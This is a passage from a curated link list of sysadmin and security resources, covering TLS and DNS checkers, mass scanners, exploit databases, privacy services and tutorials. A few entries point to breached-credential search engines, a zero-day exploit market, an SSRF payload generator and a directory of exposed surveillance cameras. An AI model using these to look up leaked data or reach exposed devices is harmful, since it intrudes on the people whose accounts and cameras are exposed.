✅ <a href="https://uselesscsp.com/"><b>Useless CSP</b></a> - public list about CSP in some big players (might make them care a bit more).<br>
✅ <a href="https://whynohttps.com/"><b>Why No HTTPS?</b></a> - top 100 websites by Alexa rank not automatically redirecting insecure requests.<br>
✅ <a href="https://ciphersuite.info/"><b>TLS Cipher Suite Search</b></a>- cipher suite search engine.<br>
✅ <a href="https://github.com/RaymiiOrg/cipherli.st"><b>cipherli.st</b></a> - strong ciphers for Apache, Nginx, Lighttpd, and more.<b>*</b><br>
✅ <a href="https://2ton.com.au/dhtool/"><b>dhtool</b></a> - public Diffie-Hellman parameter service/tool.<br>
✅ <a href="https://badssl.com/"><b>badssl.com</b></a> - memorable site for testing clients against bad SSL configs.<br>
✅ <a href="https://tlsfun.de/"><b>tlsfun.de</b></a> - registered for various tests regarding the TLS/SSL protocol.<br>
✅ <a href="https://sslmate.com/caa/"><b>CAA Record Helper</b></a> - generate a CAA policy.<br>
✅ <a href="https://ccadb.org/resources"><b>Common CA Database</b></a> - repository of information about CAs, and their root and intermediate certificates.<br>
✅ <a href="https://certstream.calidog.io/"><b>CERTSTREAM</b></a> - real-time certificate transparency log update stream.<br>
✅ <a href="https://crt.sh/"><b>crt.sh</b></a> - discovers certificates by continually monitoring all of the publicly known CT.<br>
✅ <a href="https://www.hardenize.com/"><b>Hardenize</b></a> - deploy the security standards.<br>
✅ <a href="https://cryptcheck.fr/suite/"><b>Cipher suite compatibility</b></a> - test TLS cipher suite compatibility.<br>
✅ <a href="https://www.urlvoid.com/"><b>urlvoid</b></a> - this service helps you detect potentially malicious websites.<br>
✅ <a href="https://securitytxt.org/"><b>security.txt</b></a> - a proposed standard (generator) which allows websites to define security policies.<br>
✅ <a href="https://github.com/mozilla/ssl-config-generator"><b>ssl-config-generator</b></a> - help you follow the Mozilla Server Side TLS configuration guidelines.<br>
</p>
##### :black_small_square: HTTP Headers & Web Linters
<p>
✅ <a href="https://securityheaders.com/"><b>Security Headers</b></a> - analyse the HTTP response headers (with rating system to the results).<br>
✅ <a href="https://observatory.mozilla.org/"><b>Observatory by Mozilla</b></a> - set of tools to analyze your website.<br>
✅ <a href="https://webhint.io/"><b>webhint</b></a> - is a linting tool that will help you with your site's accessibility, speed, security, and more.<br>
</p>
##### :black_small_square: DNS
<p>
✅ <a href="http://viewdns.info/"><b>ViewDNS</b></a> - one source for free DNS related tools and information.<br>
✅ <a href="https://dnslookup.org/"><b>DNSLookup</b></a> - is an advanced DNS lookup tool.<br>
✅ <a href="https://dnslytics.com/"><b>DNSlytics</b></a> - online DNS investigation tool.<br>
✅ <a href="https://dnsspy.io/"><b>DNS Spy</b></a> - monitor, validate and verify your DNS configurations.<br>
✅ <a href="https://zonemaster.iis.se/en/"><b>Zonemaster</b></a> - helps you to control how your DNS works.<br>
✅ <a href="http://leafdns.com/"><b>Leaf DNS</b></a> - comprehensive DNS tester.<br>
✅ <a href="https://findsubdomains.com/"><b>Find subdomains online</b></a> - find subdomains for security assessment penetration test.<br>
✅ <a href="https://dnsdumpster.com/"><b>DNSdumpster</b></a> - dns recon & research, find & lookup dns records.<br>
✅ <a href="https://dnstable.com/"><b>DNS Table online</b></a> - search for DNS records by domain, IP, CIDR, ISP.<br>
✅ <a href="https://intodns.com/"><b>intoDNS</b></a> - DNS and mail server health checker.<br>
✅ <a href="http://www.zonecut.net/dns/"><b>DNS Bajaj</b></a> - check the delegation of your domain.<br>
✅ <a href="https://www.buddyns.com/delegation-lab/"><b>BuddyDNS Delegation LAB</b></a> - check, trace and visualize delegation of your domain.<br>
✅ <a href="https://dnssec-debugger.verisignlabs.com/"><b>dnssec-debugger</b></a> - DS or DNSKEY records validator.<br>
✅ <a href="http://ptrarchive.com/"><b>PTRarchive.com</b></a> - this site is responsible for the safekeeping of historical reverse DNS records.<br>
✅ <a href="http://xip.io/"><b>xip.io</b></a> - wildcard DNS for everyone.<br>
✅ <a href="https://nip.io/"><b>nip.io</b></a> - dead simple wildcard DNS for any IP Address.<br>
✅ <a href="https://ceipam.eu/en/dnslookup.php"><b>dnslookup (ceipam)</b></a> - one of the best DNS propagation checker (and not only).<br>
✅ <a href="https://whatsmydns.com"><b>What's My DNS</b></a> - DNS propagation checking tool.<br>
✅ <a href="https://blog.erbbysam.com/index.php/2019/02/09/dnsgrep/"><b>DNSGrep</b></a> - quickly searching large DNS datasets.<br>
</p>
##### :black_small_square: Mail
<p>
✅ <a href="https://luxsci.com/smtp-tls-checker"><b>smtp-tls-checker</b></a> - check an email domain for SMTP TLS support.<br>
✅ <a href="https://mxtoolbox.com/SuperTool.aspx"><b>MX Toolbox</b></a> - all of your MX record, DNS, blacklist and SMTP diagnostics in one integrated tool.<br>
✅ <a href="https://www.checktls.com/index.html"><b>Secure Email</b></a> - complete email test tools for email technicians.<br>
✅ <a href="http://www.blacklistalert.org/"><b>blacklistalert</b></a> - checks to see if your domain is on a Real Time Spam Blacklist.<br>
✅ <a href="http://multirbl.valli.org/"><b>MultiRBL</b></a> - complete IP check for sending Mailservers.<br>
✅ <a href="https://dkimvalidator.com/"><b>DKIM SPF & Spam Assassin Validator</b></a> - checks mail authentication and scores messages with Spam Assassin.<br>
</p>
##### :black_small_square: Encoders/Decoders and Regex testing
<p>
✅ <a href="https://www.url-encode-decode.com/"><b>URL Encode/Decode</b></a> - tool from above to either encode or decode a string of text.<br>
✅ <a href="https://uncoder.io/"><b>Uncoder</b></a> - the online translator for search queries on log data.<br>
✅ <a href="https://regex101.com/"><b>Regex101</b></a> - online regex tester and debugger: PHP, PCRE, Python, Golang and JavaScript.<br>
✅ <a href="https://regexr.com/"><b>RegExr</b></a> - online tool to learn, build, & test Regular Expressions (RegEx / RegExp).<br>
✅ <a href="https://www.regextester.com/"><b>RegEx Testing</b></a> - online regex testing tool.<br>
✅ <a href="https://www.regexpal.com/"><b>RegEx Pal</b></a> - online regex testing tool + other tools.<br>
✅ <a href="https://gchq.github.io/CyberChef/"><b>The Cyber Swiss Army Knife</b></a> - a web app for encryption, encoding, compression and data analysis.<br>
</p>
##### :black_small_square: Net-tools
<p>
✅ <a href="https://toolbar.netcraft.com/site_report"><b>Netcraft</b></a> - detailed report about the site, helping you to make informed choices about their integrity.<b>*</b><br>
✅ <a href="https://atlas.ripe.net/"><b>RIPE NCC Atlas</b></a> - a global, open, distributed Internet measurement platform.<br>
✅ <a href="https://www.robtex.com/"><b>Robtex</b></a> - uses various sources to gather public information about IP numbers, domain names, host names, etc.<br>
✅ <a href="https://securitytrails.com/"><b>Security Trails</b></a> - APIs for Security Companies, Researchers and Teams.<br>
✅ <a href="https://tools.keycdn.com/curl"><b>Online Curl</b></a> - curl test, analyze HTTP Response Headers.<br>
✅ <a href="https://extendsclass.com/"><b>Online Tools for Developers</b></a> - HTTP API tools, testers, encoders, converters, formatters, and other tools.<br>
✅ <a href="https://ping.eu/"><b>Ping.eu</b></a> - online Ping, Traceroute, DNS lookup, WHOIS and others.<br>
✅ <a href="https://network-tools.com/"><b>Network-Tools</b></a> - network tools for webmasters, IT technicians & geeks.<br>
✅ <a href="https://bgpview.io/"><b>BGPview</b></a> - search for any ASN, IP, Prefix or Resource name.<br>
✅ <a href="https://isbgpsafeyet.com/"><b>Is BGP safe yet?</b></a> - check BGP (RPKI) security of ISPs and other major Internet players.<br>
✅ <a href="https://riseup.net/"><b>Riseup</b></a> - provides online communication tools for people and groups working on liberatory social change.<br>
✅ <a href="https://www.virustotal.com/gui/home/upload"><b>VirusTotal</b></a> - analyze suspicious files and URLs to detect types of malware.<br>
</p>
##### :black_small_square: Privacy
<p>
✅ <a href="https://www.privacytools.io/"><b>privacytools.io</b></a> - provides knowledge and tools to protect your privacy against global mass surveillance.<br>
✅ <a href="https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Test+Servers"><b>DNS Privacy Test Servers</b></a> - DNS privacy recursive servers list (with a 'no logging' policy).<br>
</p>
##### :black_small_square: Code parsers/playgrounds
<p>
✅ <a href="https://www.shellcheck.net/"><b>ShellCheck</b></a> - finds bugs in your shell scripts.<br>
✅ <a href="https://explainshell.com/"><b>explainshell</b></a> - get interactive help texts for shell commands.<br>
✅ <a href="https://jsbin.com/?html,output"><b>jsbin</b></a> - live pastebin for HTML, CSS & JavaScript, and more.<br>
✅ <a href="https://codesandbox.io/"><b>CodeSandbox</b></a> - online code editor for web application development.<br>
✅ <a href="http://sandbox.onlinephpfunctions.com/"><b>PHP Sandbox</b></a> - test your PHP code with this code tester.<br>
✅ <a href="https://www.repl.it/"><b>Repl.it</b></a> - an instant IDE to learn, build, collaborate, and host all in one place.<br>
✅ <a href="http://www.vclfiddle.net/"><b>vclFiddle</b></a> - is an online tool for experimenting with the Varnish Cache VCL.<br>
</p>
##### :black_small_square: Performance
<p>
✅ <a href="https://gtmetrix.com/"><b>GTmetrix</b></a> - analyze your site’s speed and make it faster.<br>
✅ <a href="https://performance.sucuri.net/"><b>Sucuri loadtimetester</b></a> - test here the
performance of any of your sites from across the globe.<br>
✅ <a href="https://tools.pingdom.com/"><b>Pingdom Tools</b></a> - analyze your site’s speed around the world.<br>
✅ <a href="https://pingme.io/"><b>PingMe.io</b></a> - run website latency tests across multiple geographic regions.<br>
✅ <a href="https://developers.google.com/speed/pagespeed/insights/"><b>PageSpeed Insights</b></a> - analyze your site’s speed and make it faster.<br>
✅ <a href="https://web.dev/"><b>web.dev</b></a> - helps developers like you learn and apply the web's modern capabilities to your own sites and apps.<br>
✅ <a href="https://github.com/GoogleChrome/lighthouse"><b>Lighthouse</b></a> - automated auditing, performance metrics, and best practices for the web.<br>
</p>
##### :black_small_square: Mass scanners (search engines)
<p>
✅ <a href="https://censys.io/"><b>Censys</b></a> - platform that helps information security practitioners discover, monitor, and analyze devices.<br>
✅ <a href="https://www.shodan.io/"><b>Shodan</b></a> - the world's first search engine for Internet-connected devices.<br>
✅ <a href="https://2000.shodan.io/#/"><b>Shodan 2000</b></a> - this tool looks for randomly generated data from Shodan.<br>
✅ <a href="https://viz.greynoise.io/table"><b>GreyNoise</b></a> - mass scanner such as Shodan and Censys.<br>
✅ <a href="https://www.zoomeye.org/"><b>ZoomEye</b></a> - search engine for cyberspace that lets the user find specific network components.<br>
✅ <a href="https://netograph.io/"><b>netograph</b></a> - tools to monitor and understand deep structure of the web.<br>
✅ <a href="https://fofa.so/"><b>FOFA</b></a> - is a cyberspace search engine.<br>
✅ <a href="https://www.onyphe.io/"><b>onyphe</b></a> - is a search engine for open-source and cyber threat intelligence data collected.<br>
✅ <a href="https://intelx.io/"><b>IntelligenceX</b></a> - is a search engine and data archive.<br>
✅ <a href="https://app.binaryedge.io/"><b>binaryedge</b></a> - it scan the entire internet space and create real-time threat intelligence streams and reports.<br>
✅ <a href="https://spyse.com/"><b>Spyse</b></a> - Internet assets registry: networks, threats, web objects, etc.<br>
✅ <a href="https://wigle.net/"><b>wigle</b></a> - is a submission-based catalog of wireless networks. All the networks. Found by Everyone.<br>
✅ <a href="https://publicwww.com/"><b>PublicWWW</b></a> - find any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code.<br>
✅ <a href="https://inteltechniques.com/index.html"><b>IntelTechniques</b></a> - this repository contains hundreds of online search utilities.<br>
✅ <a href="https://hunter.io/"><b>hunter</b></a> - lets you find email addresses in seconds and connect with the people that matter for your business.<br>
✅ <a href="https://ghostproject.fr/"><b>GhostProject?</b></a> - search by full email address or username.<br>
✅ <a href="https://www.databreaches.live/"><b>databreaches</b></a> - was my email affected by data breach?<br>
✅ <a href="https://weleakinfo.com"><b>We Leak Info</b></a> - world's fastest and largest data breach search engine.<br>
✅ <a href="https://pulsedive.com/"><b>Pulsedive</b></a> - scans of malicious URLs, IPs, and domains, including port scans and web requests.<br>
✅ <a href="https://buckets.grayhatwarfare.com/"><b>Buckets by Grayhatwarfar</b></a> - database with public search for Open Amazon S3 Buckets and their contents.<br>
✅ <a href="https://vigilante.pw/"><b>Vigilante.pw</b></a> - the breached database directory.<br>
✅ <a href="https://builtwith.com/"><b>builtwith</b></a> - find out what websites are built with.<br>
✅ <a href="https://nerdydata.com/"><b>NerdyData</b></a> - search the web's source code for technologies, across millions of sites.<br>
✅ <a href="http://zorexeye.com/"><b>zorexeye</b></a> - search for sites, images, apps, softwares & more.<br>
✅ <a href="https://www.mmnt.net/"><b>Mamont's open FTP Index</b></a> - if a target has an open FTP site with accessible content it will be listed here.<br>
✅ <a href="https://osintframework.com/"><b>OSINT Framework</b></a> - focused on gathering information from free tools or resources.<br>
✅ <a href="https://www.maltiverse.com/search"><b>maltiverse</b></a> - is a service oriented to cybersecurity analysts for the advanced analysis of indicators of compromise.<br>
✅ <a href="https://leakedsource.ru/main/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
✅ <a href="https://search.weleakinfo.com/"><b>We Leak Info</b></a> - to help everyday individuals secure their online life, avoiding getting hacked.<br>
✅ <a href="https://pipl.com/"><b>pipl</b></a> - is the place to find the person behind the email address, social username or phone number.<br>
✅ <a href="https://abuse.ch/"><b>abuse.ch</b></a> - is operated by a random swiss guy fighting malware for non-profit.<br>
✅ <a href="http://malc0de.com/database/"><b>malc0de</b></a> - malware search engine.<br>
✅ <a href="https://cybercrime-tracker.net/index.php"><b>Cybercrime Tracker</b></a> - monitors and tracks various malware families that are used to perpetrate cyber crimes.<br>
✅ <a href="https://github.com/eth0izzle/shhgit/"><b>shhgit</b></a> - find GitHub secrets in real time.<br>
✅ <a href="https://searchcode.com/"><b>searchcode</b></a> - helping you find real world examples of functions, API's and libraries.<br>
✅ <a href="http://www.insecam.org/"><b>Insecam</b></a> - the world biggest directory of online surveillance security cameras.<br>
✅ <a href="http://index-of.es/"><b>index-of</b></a> - contains great stuff like: security, hacking, reverse engineering, cryptography, programming etc.<br>
✅ <a href="https://opendata.rapid7.com/"><b>Rapid7 Labs Open Data</b></a> - is a great resources of datasets from Project Sonar.<br>
✅ <a href="https://webtechsurvey.com/common-response-headers"><b>Common Response Headers</b></a> - the largest database of HTTP response headers.<br>
</p>
##### :black_small_square: Generators
<p>
✅ <a href="https://thispersondoesnotexist.com/"><b>thispersondoesnotexist</b></a> - generate fake faces in one click - endless possibilities.<br>
✅ <a href="https://generated.photos"><b>AI Generated Photos</b></a> - 100.000 AI generated faces.<br>
✅ <a href="https://www.fakenamegenerator.com/"><b>fakenamegenerator</b></a> - your randomly generated identity.<br>
✅ <a href="https://tools.intigriti.io/redirector/"><b>Intigriti Redirector</b></a> - open redirect/SSRF payload generator.<br>
</p>
##### :black_small_square: Passwords
<p>
✅ <a href="https://haveibeenpwned.com/"><b>have i been pwned?</b></a> - check if you have an account that has been compromised in a data breach.<br>
✅ <a href="https://www.dehashed.com/"><b>dehashed</b></a> - is a hacked database search engine.<br>
✅ <a href="https://leakedsource.ru/"><b>Leaked Source</b></a> - is a collaboration of data found online in the form of a lookup.<br>
</p>
##### :black_small_square: CVE/Exploits databases
<p>
✅ <a href="https://cve.mitre.org/"><b>CVE Mitre</b></a> - list of publicly known cybersecurity vulnerabilities.<br>
✅ <a href="https://www.cvedetails.com/"><b>CVE Details</b></a> - CVE security vulnerability advanced database.<br>
✅ <a href="https://www.exploit-db.com/"><b>Exploit DB</b></a> - CVE compliant archive of public exploits and corresponding vulnerable software.<br>
✅ <a href="https://0day.today/"><b>0day.today</b></a> - exploits market provides you the possibility to buy/sell zero-day exploits.<br>
✅ <a href="https://sploitus.com/"><b>sploitus</b></a> - the exploit and tools database.<br>
✅ <a href="https://cxsecurity.com/exploit/"><b>cxsecurity</b></a> - free vulnerability database.<br>
✅ <a href="https://www.vulncode-db.com/"><b>Vulncode-DB</b></a> - is a database for vulnerabilities and their corresponding source code if available.<br>
✅ <a href="https://cveapi.com/"><b>cveapi</b></a> - free API for CVE data.<br>
</p>
##### :black_small_square: Mobile apps scanners
<p>
✅ <a href="https://www.immuniweb.com/mobile/"><b>ImmuniWeb® Mobile App Scanner</b></a> - test security and privacy of mobile apps (iOS & Android).<br>
✅ <a href="https://vulnerabilitytest.quixxi.com/"><b>Quixxi</b></a> - free Mobile App Vulnerability Scanner for Android & iOS.<br>
✅ <a href="https://www.ostorlab.co/scan/mobile/"><b>Ostorlab</b></a> - analyzes mobile application to identify vulnerabilities and potential weaknesses.<br>
</p>
##### :black_small_square: Private Search Engines
<p>
✅ <a href="https://www.startpage.com/"><b>Startpage</b></a> - the world's most private search engine.<br>
✅ <a href="https://searx.me/"><b>searX</b></a> - a privacy-respecting, hackable metasearch engine.<br>
✅ <a href="https://darksearch.io/"><b>darksearch</b></a> - the 1st real Dark Web search engine.<br>
✅ <a href="https://www.qwant.com/"><b>Qwant</b></a> - the search engine that respects your privacy.<br>
✅ <a href="https://duckduckgo.com/"><b>DuckDuckGo</b></a> - the search engine that doesn't track you.<br>
✅ <a href="https://swisscows.com/"><b>Swisscows</b></a> - privacy safe web search<br>
✅ <a href="https://search.disconnect.me/"><b>Disconnect</b></a> - the search engine that anonymizes your searches.<br>
✅ <a href="https://metager.org/"><b>MetaGer</b></a> - the search engine that uses anonymous proxy and hidden Tor branches.<br>
</p>
##### :black_small_square: Secure Webmail Providers
<p>
✅ <a href="https://countermail.com/"><b>CounterMail</b></a> - online email service, designed to provide maximum security and privacy.<br>
✅ <a href="http://mail2tor.com/"><b>Mail2Tor</b></a> - is a Tor Hidden Service that allows anyone to send and receive emails anonymously.<br>
✅ <a href="https://tutanota.com/"><b>Tutanota</b></a> - is the world's most secure email service and amazingly easy to use.<br>
✅ <a href="https://protonmail.com/"><b>Protonmail</b></a> - is the world's largest secure email service, developed by CERN and MIT scientists.<br>
✅ <a href="https://www.startmail.com/en/"><b>Startmail</b></a> - private & encrypted email made easy.<br>
</p>
##### :black_small_square: Crypto
<p>
✅ <a href="https://keybase.io/"><b>Keybase</b></a> - it's open source and powered by public-key cryptography.<br>
</p>
##### :black_small_square: PGP Keyservers
<p>
✅ <a href="https://keyserver.ubuntu.com/"><b>SKS OpenPGP Key server</b></a> - services for the SKS keyservers used by OpenPGP.<br>
</p>
#### Systems/Services [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Operating Systems
<p>
✅ <a href="http://www.slackware.com/"><b>Slackware</b></a> - the most "Unix-like" Linux distribution.<br>
✅ <a href="https://www.openbsd.org/"><b>OpenBSD</b></a> - multi-platform 4.4BSD-based UNIX-like operating system.<br>
✅ <a href="https://hardenedbsd.org/"><b>HardenedBSD</b></a> - HardenedBSD aims to implement innovative exploit mitigation and security solutions.<br>
✅ <a href="https://www.kali.org/"><b>Kali Linux</b></a> - Linux distribution used for Penetration Testing, Ethical Hacking and network security assessments.<br>
✅ <a href="https://www.parrotsec.org/"><b>Parrot Security OS</b></a> - cyber security GNU/Linux environment.<br>
✅ <a href="https://www.backbox.org/"><b>Backbox Linux</b></a> - penetration test and security assessment oriented Ubuntu-based Linux distribution.<br>
✅ <a href="https://blackarch.org/"><b>BlackArch</b></a> - is an Arch Linux-based penetration testing distribution for penetration testers.<br>
✅ <a href="https://www.pentoo.ch/"><b>Pentoo</b></a> - is a security-focused livecd based on Gentoo.<br>
✅ <a href="https://securityonion.net/"><b>Security Onion</b></a> - Linux distro for intrusion detection, enterprise security monitoring, and log management.<br>
✅ <a href="https://tails.boum.org/"><b>Tails</b></a> - is a live system that aims to preserve your privacy and anonymity.<br>
✅ <a href="https://github.com/vedetta-com/vedetta"><b>vedetta</b></a> - OpenBSD router boilerplate.<br>
✅ <a href="https://www.qubes-os.org"><b>Qubes OS</b></a> - is a security-oriented OS that uses Xen-based virtualization.<br>
</p>
##### :black_small_square: HTTP(s) Services
<p>
✅ <a href="https://varnish-cache.org/"><b>Varnish Cache</b></a> - HTTP accelerator designed for content-heavy dynamic web sites.<br>
✅ <a href="https://nginx.org/"><b>Nginx</b></a> - open source web and reverse proxy server that is similar to Apache, but very light weight.<br>
✅ <a href="https://openresty.org/en/"><b>OpenResty</b></a> - is a dynamic web platform based on NGINX and LuaJIT.<br>
✅ <a href="https://github.com/alibaba/tengine"><b>Tengine</b></a> - a distribution of Nginx with some advanced features.<br>
✅ <a href="https://caddyserver.com/"><b>Caddy Server</b></a> - is an open source, HTTP/2-enabled web server with HTTPS by default.<br>
✅ <a href="https://www.haproxy.org/"><b>HAProxy</b></a> - the reliable, high performance TCP/HTTP load balancer.<br>
</p>
##### :black_small_square: DNS Services
<p>
✅ <a href="https://nlnetlabs.nl/projects/unbound/about/"><b>Unbound</b></a> - validating, recursive, and caching DNS resolver (with TLS).<br>
✅ <a href="https://www.knot-resolver.cz/"><b>Knot Resolver</b></a> - caching full resolver implementation, including both a resolver library and a daemon.<br>
✅ <a href="https://www.powerdns.com/"><b>PowerDNS</b></a> - is an open source authoritative DNS server, written in C++ and licensed under the GPL.<br>
</p>
##### :black_small_square: Other Services
<p>
✅ <a href="https://github.com/z3APA3A/3proxy"><b>3proxy</b></a> - tiny free proxy server.<br>
</p>
##### :black_small_square: Security/hardening
<p>
✅ <a href="https://twitter.com/EmeraldOnion"><b>Emerald Onion</b></a> - is a 501(c)(3) nonprofit organization and transit internet service provider (ISP).<br>
✅ <a href="https://github.com/pi-hole/pi-hole"><b>pi-hole</b></a> - the Pi-hole® is a DNS sinkhole that protects your devices from unwanted content.<br>
✅ <a href="https://github.com/stamparm/maltrail"><b>maltrail</b></a> - malicious traffic detection system.<br>
✅ <a href="https://github.com/Netflix/security_monkey"><b>security_monkey</b></a> - monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time.<br>
✅ <a href="https://github.com/firecracker-microvm/firecracker"><b>firecracker</b></a> - secure and fast microVMs for serverless computing.<br>
✅ <a href="https://github.com/StreisandEffect/streisand"><b>streisand</b></a> - sets up a new server running your choice of WireGuard, OpenSSH, OpenVPN, and more.<br>
</p>
#### Networks [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Tools
<p>
✅ <a href="https://www.capanalysis.net/ca/"><b>CapAnalysis</b></a> - web visual tool to analyze large amounts of captured network traffic (PCAP analyzer).<br>
✅ <a href="https://github.com/digitalocean/netbox"><b>netbox</b></a> - IP address management (IPAM) and data center infrastructure management (DCIM) tool.<br>
</p>
##### :black_small_square: Labs
<p>
✅ <a href="https://labs.networkreliability.engineering/"><b>NRE Labs</b></a> - learn automation by doing it. Right now, right here, in your browser.<br>
</p>
##### :black_small_square: Other
<p>
✅ <a href="https://ee.lbl.gov/"><b>LBNL's Network Research Group</b></a> - home page of the Network Research Group (NRG).<br>
</p>
#### Containers/Orchestration [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: CLI Tools
<p>
✅ <a href="https://github.com/google/gvisor"><b>gvisor</b></a> - container runtime sandbox.<br>
✅ <a href="https://github.com/bcicen/ctop"><b>ctop</b></a> - top-like interface for container metrics.<br>
</p>
##### :black_small_square: Web Tools
<p>
✅ <a href="https://github.com/moby/moby"><b>Moby</b></a> - a collaborative project for the container ecosystem to assemble container-based system.<br>
✅ <a href="https://traefik.io/"><b>Traefik</b></a> - open source reverse proxy/load balancer provides easier integration with Docker and Let's encrypt.<br>
✅ <a href="https://github.com/Kong/kong"><b>kong</b></a> - The Cloud-Native API Gateway.<br>
✅ <a href="https://github.com/rancher/rancher"><b>rancher</b></a> - complete container management platform.<br>
✅ <a href="https://github.com/portainer/portainer"><b>portainer</b></a> - making Docker management easy.<br>
✅ <a href="https://github.com/jwilder/nginx-proxy"><b>nginx-proxy</b></a> - automated nginx proxy for Docker containers using docker-gen.<br>
</p>
##### :black_small_square: Security
<p>
✅ <a href="https://github.com/docker/docker-bench-security"><b>docker-bench-security</b></a> - checks for dozens of common best-practices around deploying Docker.<br>
✅ <a href="https://github.com/aquasecurity/trivy"><b>trivy</b></a> - vulnerability scanner for containers, suitable for CI.<br>
✅ <a href="https://goharbor.io/"><b>Harbor</b></a> - cloud native registry project that stores, signs, and scans content.<br>
</p>
##### :black_small_square: Manuals/Tutorials/Best Practices
<p>
✅ <a href="https://github.com/wsargent/docker-cheat-sheet"><b>docker-cheat-sheet</b></a> - a quick reference cheat sheet on Docker.<br>
✅ <a href="https://github.com/veggiemonk/awesome-docker"><b>awesome-docker</b></a> - a curated list of Docker resources and projects.<br>
✅ <a href="https://github.com/yeasy/docker_practice"><b>docker_practice</b></a> - learn and understand Docker technologies, with real DevOps practice!<br>
✅ <a href="https://github.com/docker/labs"><b>labs
</b></a> - is a collection of tutorials for learning how to use Docker with various tools.<br>
✅ <a href="https://github.com/jessfraz/dockerfiles"><b>dockerfiles</b></a> - various Dockerfiles I use on the desktop and on servers.<br>
✅ <a href="https://github.com/kelseyhightower/kubernetes-the-hard-way"><b>kubernetes-the-hard-way</b></a> - bootstrap Kubernetes the hard way on Google Cloud Platform. No scripts.<br>
✅ <a href="https://github.com/jamesward/kubernetes-the-easy-way"><b>kubernetes-the-easy-way</b></a> - bootstrap Kubernetes the easy way on Google Cloud Platform. No scripts.<br>
✅ <a href="https://github.com/dennyzhang/cheatsheet-kubernetes-A4"><b>cheatsheet-kubernetes-A4</b></a> - Kubernetes CheatSheets in A4.<br>
✅ <a href="https://github.com/kabachook/k8s-security"><b>k8s-security</b></a> - kubernetes security notes and best practices.<br>
✅ <a href="https://learnk8s.io/production-best-practices/"><b>kubernetes-production-best-practices</b></a> - checklists with best-practices for production-ready Kubernetes.<br>
✅ <a href="https://github.com/freach/kubernetes-security-best-practice"><b>kubernetes-production-best-practices</b></a> - kubernetes security - best practice guide.<br>
✅ <a href="https://github.com/hjacobs/kubernetes-failure-stories"><b>kubernetes-failure-stories</b></a> - is a compilation of public failure/horror stories related to Kubernetes.<br>
</p>
#### Manuals/Howtos/Tutorials [<sup>[TOC]</sup>](#anger-table-of-contents)
##### :black_small_square: Shell/Command line
<p>
✅ <a href="https://github.com/dylanaraps/pure-bash-bible"><b>pure-bash-bible</b></a> - is a collection of pure bash alternatives to external processes.<br>
✅ <a href="https://github.com/dylanaraps/pure-sh-bible"><b>pure-sh-bible</b></a> - is a collection of pure POSIX sh alternatives to external processes.<br>
✅ <a href="https://github.com/Idnan/bash-guide"><b>bash-guide</b></a> - is a guide to learn bash.<br>
✅ <a href="https://github.com/denysdovhan/bash-handbook"><b>bash-handbook</b></a> - for those who wanna learn Bash.<br>
✅ <a href="https://wiki.bash-hackers.org/start"><b>The Bash Hackers Wiki</b></a> - hold documentation of any kind about GNU Bash.<br>
✅ <a href="http://pubs.opengroup.org/onlinepubs/9699919799/utilities/contents.html"><b>Shell & Utilities</b></a> - describes the commands offered to application programs by POSIX-conformant systems.<br>
✅ <a href="https://github.com/jlevy/the-art-of-command-line"><b>the-art-of-command-line</b></a> - master the command line, in one page.<br>
✅ <a href="https://google.github.io/styleguide/shellguide.html"><b>Shell Style Guide</b></a> - a shell style guide for Google-originated open-source projects.<br>
</p>
##### :black_small_square: Text Editors
<p>
✅ <a href="https://vim.rtorr.com/"><b>Vim Cheat Sheet</b></a> - great multi language vim guide.<br>
</p>
##### :black_small_square: Python
<p>
✅ <a href="https://awesome-python.com/"><b>Awesome Python</b></a> - a curated list of awesome Python frameworks, libraries, software and resources.<br>
✅ <a href="https://github.com/gto76/python-cheatsheet"><b>python-cheatsheet</b></a> - comprehensive Python cheatsheet.<br>
✅ <a href="https://www.pythoncheatsheet.org/"><b>pythoncheatsheet.org</b></a> - basic reference for beginner and advanced developers.<br>
</p>
##### :black_small_square: Sed & Awk & Other
<p>
✅ <a href="https://posts.specterops.io/fawk-yeah-advanced-sed-and-awk-usage-parsing-for-pentesters-3-e5727e11a8ad?gi=c8f9506b26b6"><b>F’Awk Yeah!</b></a> - advanced sed and awk usage (Parsing for Pentesters 3).<br>
</p>
##### :black_small_square: \*nix & Network
<p>
✅ <a href="https://www.cyberciti.biz/"><b>nixCraft</b></a> - linux and unix tutorials for new and seasoned sysadmin.<br>
✅ <a href="https://www.tecmint.com/"><b>TecMint</b></a> - the ideal Linux blog for Sysadmins & Geeks.<br>
✅ <a href="http://www.omnisecu.com/index.php"><b>Omnisecu</b></a> - free Networking, System Administration and Security tutorials.<br>
✅ <a href="https://github.com/cirosantilli/linux-cheat"><b>linux-cheat</b></a> - Linux tutorials and cheatsheets. Minimal examples. Mostly user-land CLI utilities.<br>
✅ <a href="https://github.com/snori74/linuxupskillchallenge"><b>linuxupskillchallenge</b></a> - learn the skills required to sysadmin.<br>
✅ <a href="http://cb.vu/unixtoolbox.xhtml"><b>Unix Toolbox</b></a> - Unix/Linux/BSD commands and tasks which are useful for IT work or for advanced users.<br>
✅ <a href="https://linux-kernel-labs.github.io/refs/heads/master/index.html"><b>Linux Kernel Teaching</b></a> - is a collection of lectures and labs Linux kernel topics.<br>
✅ <a href="https://peteris.rocks/blog/htop/"><b>htop explained</b></a> - explanation of everything you can see in htop/top on Linux.<br>
✅ <a href="https://linuxguideandhints.com/"><b>Linux Guide and Hints</b></a> - tutorials on system administration in Fedora and CentOS.<br>
✅ <a href="https://github.com/NanXiao/strace-little-book"><b>strace-little-book</b></a> - a little book which introduces strace.<br>
✅ <a href="https://github.com/goldshtn/linux-tracing-workshop"><b>linux-tracing-workshop</b></a> - examples and hands-on labs for Linux tracing tools workshops.<br>
✅ <a href="https://github.com/bagder/http2-explained"><b>http2-explained</b></a> - a detailed document explaining and documenting HTTP/2.<br>
✅ <a href="https://github.com/bagder/http3-explained"><b>http3-explained</b></a> - a document describing the HTTP/3 and QUIC protocols.<br>
✅ <a href="https://www.manning.com/books/http2-in-action"><b>HTTP/2 in Action</b></a> - an excellent introduction to the new HTTP/2 standard.<br>
✅ <a href="https://www.saminiir.com/lets-code-tcp-ip-stack-1-ethernet-arp/"><b>Let's code a TCP/IP stack</b></a> - great stuff to learn network and system programming at a deeper level.<br>
